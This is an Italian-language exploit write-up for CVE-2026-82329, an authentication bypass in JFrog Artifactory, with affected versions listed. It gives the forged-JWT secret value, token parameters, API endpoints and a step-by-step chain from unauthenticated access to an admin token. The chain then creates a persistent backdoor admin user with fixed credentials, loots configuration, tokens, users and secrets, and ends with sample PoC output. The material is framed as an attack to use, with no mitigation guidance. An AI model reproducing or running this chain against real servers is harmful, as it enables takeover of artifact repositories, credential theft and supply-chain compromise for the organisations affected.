
Exploit PoC per CVE-2026-82329, un bypass dell'autenticazione in JFrog Artifactory. Dimostra la falsificazione di token JWT per ottenere accesso admin e creare un utente backdoor persistente.
CVE-2026-82329 — Bypass dell'autenticazione in JFrog Artifactory
La vulnerabilità
Bypass critico dell'autenticazione in JFrog Artifactory (versioni 7.111.20, 7.117.27, 7.125.19, 7.133.28, 7.146.37, 7.161.19). La falla consente a un attaccante non autenticato di forgiare un JWT utilizzando un segreto HMAC vuoto (32 byte di 0x20), generare un token admin e creare un utente backdoor.
Catena di sfruttamento
Passaggio Azione 1 Forgiare JWT con alg=HS256, kid=SHA256(""), skip_node_registration=true 2 Inviare JWT a /access/api/v1/registry/join → ottenere token SERVICE 3 Scambiare il token SERVICE per un token ADMIN tramite /access/api/v1/tokens 4 Verificare l'accesso admin tramite /artifactory/api/system/configuration, /access/api/v1/tokens, /artifactory/api/system/version 5 Creare un utente admin persistente tramite /artifactory/api/security/users/{user} 6 Saccheggiare config, token, utenti, repository, segreti 7 Forgiare token per soggetti ad alto valore
Flusso dell'attacco
BLANK_SECRET = b"\x20" * 32
↓
Forgia JWT (HS256, kid=hashlib.sha256(""))
↓
POST /access/api/v1/registry/join
↓
Token SERVICE (scp=admin)
↓
POST /access/api/v1/tokens
↓
Token ADMIN (scp=applied-permissions/admin, aud=*)
↓
Prova di Admin (GET /artifactory/api/system/configuration → 200)
↓
PUT /artifactory/api/security/users/0xTerror
↓
Utente Admin Persistente: 0xTerror:Terrorp0c!7777
↓
Saccheggio: Config, Token, Utenti, Repository, Segreti
↓
Verifica Pivot: Xray, Mission Control, Distribution, ecc.
↓
Forgia Token per Soggetti ad Alto Valore
Esempio di Output del PoC
[+] Step 1 /registry/join -> HTTP 201 token SERVICE (scp=admin)
[+] Step 2 /access/api/v1/tokens -> HTTP 200 token ADMIN (scp=applied-permissions/admin)
[+] Step 3 prova di admin: config=200, tokens=200, version=200
[+] Step 4 crea utente admin '0xTerror' -> HTTP 201
[=] VULNERABILE — attaccante non autenticato ha ottenuto ADMIN
Utente admin: 0xTerror:Terrorp0c!7777